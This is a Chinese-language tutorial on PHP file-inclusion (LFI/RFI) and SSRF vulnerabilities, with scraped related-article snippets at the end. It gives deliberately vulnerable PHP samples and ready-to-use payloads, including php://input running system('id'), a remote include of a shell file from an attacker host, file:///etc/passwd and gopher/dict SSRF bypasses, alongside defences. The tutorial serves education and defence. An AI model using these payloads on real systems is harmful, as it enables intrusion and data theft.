深入理解PHP安全漏洞:文件包含与SSRF攻击全解析

深入理解PHP安全漏洞:文件包含与SSRF攻击全解析

前言

在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防御措施。

第一部分:文件包含漏洞详解

什么是文件包含漏洞?

文件包含漏洞是PHP应用程序中常见的安全问题,当开发者使用包含函数引入文件时,如果传入的文件名参数未经严格校验,攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。

危险函数

PHP中有四个主要的文件包含函数:

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞类型

1. 本地文件包含(LFI)

利用方式:

  • 直接读取Flag文件
  • 通过PHP伪协议读取源代码
  • 写入PHP木马获取webshell

示例代码:

<?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {include '/home/www/'.$file.'.php';
} else {include '/home/www/'.'home.php';
}
?>

利用方法:

http://www.example.com/demo1.php?file=flag.php%00
2. PHP伪协议利用

常用伪协议:

  1. file:// 协议:
http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
  1. php://filter
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
  1. php://input
POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
3. 远程文件包含(RFI)

必要条件:

  • allow_url_fopen = On
  • allow_url_include = On

示例代码:

<?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>

利用方法:

http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?

防御措施

  1. 白名单验证
  2. 禁用危险配置:
    allow_url_fopen = Off
    allow_url_include = Off
    
  3. 设置open_basedir
  4. 严格校验用户输入
  5. 避免动态包含

第二部分:SSRF漏洞深入解析

什么是SSRF?

SSRF(Server-Side Request Forgery)是一种由攻击者构造形成由服务端发起请求的安全漏洞。攻击者可以利用此漏洞访问外网无法访问的内部系统。

常见危险函数

  1. file_get_contents()
<?php
if (isset($_POST['url'])) {$content = file_get_contents($_POST['url']);$filename = '/images/'.rand().'img1.jpg';file_put_contents($filename, $content);echo $_POST['url'];$img = "<img src=\"".$filename."\"/>";echo $img;
}
?>
  1. fsockopen()
<?php
function GetFile($host, $port, $link) {$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if (!$fp) {echo "$errstr (error number $errno) \n";} else {$out = "GET $link HTTP/1.1\r\n";$out .= "Host: $host\r\n";$out .= "Connection: Close\r\n\r\n";$out .= "\r\n";fwrite($fp, $out);$contents = '';while (!feof($fp)) {$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}
}
?>
  1. curl_exec()
<?php
if (isset($_POST['url'])) {$link = $_POST['url'];$curlobj = curl_init();curl_setopt($curlobj, CURLOPT_POST, 0);curl_setopt($curlobj, CURLOPT_URL,$link);curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($curlobj);curl_close($curlobj);$filename = './curled/'.rand().'.txt';file_put_contents($filename, $result);echo $result;
}
?>

SSRF绕过技巧

1. IP编码绕过
  • 使用xip.io域名:
    10.0.0.1.xip.io
    
  • IP转换为10进制
2. 协议变换
  • Dict协议:
    dict://192.168.1.1:8080/test:dict
    
  • Gopher协议:
    gopher://192.168.1.1/gopher
    
  • File协议:
    file:///etc/passwd
    
3. Gopher协议高级利用

Gopher协议可以攻击内网的多种服务:

  • FTP
  • Telnet
  • Redis
  • Memcache

Redis攻击示例:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
4. filter_var()绕过
<?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
if(filter_var($url, FILTER_VALIDATE_URL)) {$r = parse_url($url);var_dump($r);if (preg_match('/skysec\.top$/', $r['host'])) {exec("curl -v -s ".$r['host']."", $a);} else {echo "Error: Host not allowed";}
} else {echo "Error: Invalid URL";
}
?>

绕过方法:

http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
5. 30x跳转绕过
<?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_exec($ch);curl_close($ch);
}

防御SSRF的最佳实践

  1. 限制协议:只允许HTTP和HTTPS
  2. 禁止访问内网IP
  3. 设置URL白名单
  4. 禁用CURLOPT_FOLLOWLOCATION
  5. 使用DNS解析结果校验
  6. 过滤返回信息

结语

文件包含和SSRF漏洞都可能对Web应用造成严重威胁。作为开发者,理解这些漏洞的原理和利用方式,才能更好地防御它们。安全是一个持续的过程,需要开发者保持警惕并不断更新知识。

免责声明:本文所有技术内容仅用于教育目的和安全研究,未经授权对他人系统进行测试属于违法行为。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.pswp.cn/pingmian/83905.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MS358A 低功耗运算放大器 车规

MS358A 低功耗运算放大器 车规 产品简述 MS358A 是双通道运算放大器&#xff0c;具有低功耗、宽电源电压范围、高单位增益带宽的特性。在特定情况下&#xff0c;压摆率可以达到0.4V/μs 。每个通道的静态电流 (5V) 只有 430μA 。 MS358A输入共模范围可以到地&#xff0c;同时…

n8n + AI Agent:AI 自动化生成测试用例并支持导出 Excel

n8n + AI Agent:AI 自动化生成测试用例并支持导出 Excel 最终成果展示一、准备工作二、手把手搭建工作流第一步:创建手动触发器 (Chat Trigger)第二步:创建 AI Agent 节点第三步:为 AI Agent 植入 DeepSeek AI 模型第四步:解析AI的响应 (Code)第五步:生成Excel文件 (Conv…

5.1 HarmonyOS NEXT系统级性能调优:内核调度、I/O优化与多线程管理实战

HarmonyOS NEXT系统级性能调优&#xff1a;内核调度、I/O优化与多线程管理实战 在HarmonyOS NEXT的全场景生态中&#xff0c;系统级性能调优是构建流畅、高效应用的关键。通过内核调度精细化控制、存储与网络I/O深度优化&#xff0c;以及多线程资源智能管理&#xff0c;开发者…

​线性注意力 vs. 传统注意力:效率与表达的博弈新解

​核心结论​&#xff1a;线性注意力用计算复杂度降维换取全局建模能力&#xff0c;通过核函数和结构优化补足表达缺陷 一、本质差异&#xff1a;两种注意力如何工作&#xff1f; ​特性​传统注意力&#xff08;Softmax Attention&#xff09;线性注意力&#xff08;Linear At…

github中main与master,master无法合并到main

文章目录 遇到问题背景怎么做 遇到问题 上传 github 时候&#xff0c;发现传上去的是 master&#xff0c;但是 github 竟然还有一个 main 背景 github 采用 main 替代 master 作为主分支不是出于技术背景&#xff0c;而是出于 2020 年全球范围内兴起的 “Black Lives Matter…

使用矩阵乘法+线段树解决区间历史和问题的一种通用解法

文章目录 前言P8868 [NOIP2022] 比赛CF1824DP9990/2020 ICPC EcFinal G 前言 一般解决普通的区间历史和&#xff0c;只需要定义辅助 c h s − t ⋅ a chs-t\cdot a chs−t⋅a&#xff0c; h s hs hs是历史和&#xff0c; a a a是区间和&#xff0c; t t t是时间戳&#xff0c…

RabbitMQ入门4.1.0版本(基于java、SpringBoot操作)

RabbitMQ 一、RabbitMQ概述 RabbitMQ RabbitMQ最初由LShift和CohesiveFT于2007年开发&#xff0c;后来由Pivotal Software Inc.&#xff08;现为VMware子公司&#xff09;接管。RabbitMQ 是一个开源的消息代理和队列服务器&#xff0c;用 Erlang 语言编写。广泛应用于各种分布…

Python Copilot【代码辅助工具】 简介

粉丝爱买鳕鱼肠深海鳕鱼肉鱼肉香肠盼盼麦香鸡味块卡乐比&#xff08;Calbee&#xff09;薯条三兄弟 独立小包美丽雅 奶茶杯一次性饮料杯好时kisses多口味巧克力糖老金磨方【黑金系列】黑芝麻丸郑新初网红郑新初烤鲜牛肉干超人毛球修剪器去球器剃毛器衣服去毛器优惠券宁之春 红黑…

VBA进度条ProgressForm1

上一章《VBA如何使用ProgressBar进度条控件》介绍了ProgressBar控件的使用方法&#xff0c;今天我给大家介绍ProgressForm1进度条的使用方法&#xff0c;ProgressForm1是集成ProgressBar控件和Label控件的窗体&#xff0c;可以同时显示进度条和百分比&#xff0c;如下图&#x…

快速部署和启动Vue3项目

快速入门Vue3 一、安装 Node.js 和 npm Vue 3 是基于 JavaScript 的框架&#xff0c;Node.js 提供了 JavaScript 运行环境&#xff0c;npm 是 Node.js 的包管理工具&#xff0c;用于安装和管理 Vue 3 及相关依赖。访问 Node.js 官方网站&#xff08;https://nodejs.org/&…

[TIP] Ubuntu 22.04 配置多个版本的 GCC 环境

问题背景 在 Ubuntu 22.04 中安装 VMware 虚拟机时&#xff0c;提示缺少 VMMON 和 VMNET 模块 编译这两个模块需要 GCC 的版本大于 12.3.0&#xff0c;而 Ubuntu 22.04 自带的 GCC 版本为 11.4.0 因此需要安装对应的 GCC 版本&#xff0c;但为了不影响其他程序&#xff0c;需…

【西门子杯工业嵌入式-4-什么是外部中断】

西门子杯工业嵌入式-4-什么是外部中断 一、中断的基本概念1. 什么是中断2. 生活中的中断示例3. MCU 中的中断机制 二、NVIC 嵌套向量中断控制器1. NVIC 简介2. NVIC 的作用3. 中断向量表 三、中断优先级机制1. 中断优先级的含义2. 抢占与响应优先级3. 优先级分组配置 四、外部中…

Blocked aria-hidden on an element because its descendant retained focus.

问题出在 Element UI 的 el-table 组件 全选功能上&#xff0c;这是一个常见的无障碍&#xff08;a11y&#xff09;问题。这个错误提示与网页 accessibility&#xff08;无障碍访问&#xff09;相关&#xff0c;涉及 aria-hidden 属性的不当使用。 问题原因分析 1. Element U…

App/uni-app 离线本地存储方案有哪些?最推荐的是哪种方案?

以下是 UniApp 离线本地存储方案的详细介绍及推荐方案分析&#xff1a; 一、UniApp 离线本地存储方案分类 1. 基于 uni.storage 系列 API&#xff08;跨端基础方案&#xff09; API 及特点&#xff1a; 提供 uni.setStorage&#xff08;异步存储&#xff09;、uni.getStorag…

数据库系统概论(十七)超详细讲解数据库规范化与五大范式(从函数依赖到多值依赖,再到五大范式,附带例题,表格,知识图谱对比带你一步步掌握)

数据库系统概论&#xff08;十七&#xff09;超详细讲解数据库规范化与五大范式&#xff08;从函数依赖到多值依赖&#xff0c;再到五大范式&#xff0c;附带例题&#xff0c;表格&#xff0c;知识图谱对比带你一步步掌握&#xff09; 前言一、为什么需要规范化1. 我们先想一个…

交互标牌——视觉货币(数字)转换器项目及源码

一、作品简介 视觉货币&#xff08;数字&#xff09;转换器是我为交互标牌创客争霸赛设计的项目&#xff0c;项目的主要功能是能将所见的数字按照设定的公式转换成新的单位量&#xff0c;这里我主要演示的是货币转换&#xff0c;直接将摄像头对准价签&#xff0c;即可显示出转换…

React 第五十四节 Router中useRevalidator的使用详解及案例分析

前言 useRevalidator 是 React Router v6.4 引入的一个强大钩子&#xff0c;用于在数据路由&#xff08;Data Router&#xff09;中手动触发路由数据的重新验证&#xff08;revalidation&#xff09;。 它在需要主动刷新数据而不改变路由位置的场景中非常有用。 一、useReval…

“一代更比一代强”:现代 RAG 架构的演进之路

编者按&#xff1a; 我们今天为大家带来的文章&#xff0c;作者的观点是&#xff1a;RAG 技术的演进是一个从简单到复杂、从 Naive 到 Agentic 的系统性优化过程&#xff0c;每一次优化都是在试图解决无数企业落地大语言模型应用时出现的痛点问题。 文章首先剖析 Naive RAG 的基…

Flask-SQLAlchemy使用小结

链表查询 join方法允许你指定两个或多个表之间的连接条件&#xff0c;并返回一个新的查询对象&#xff0c;该对象包含了连接后的结果。 内连接 from sqlalchemy import join # 使用join函数 query db.session.query(User, Order).join(Order, User.id Order.user_id) res…

【python与生活】如何构建一个解读IPO招股书的算法?

构建一个基于Python的IPO招股书解读算法需要结合自然语言处理&#xff08;NLP&#xff09;技术和大型语言模型&#xff08;LLM&#xff09;。以下是一个完整的解决方案&#xff0c;使用LangChain框架和OpenAI的GPT模型&#xff1a; import os import re import pandas as pd f…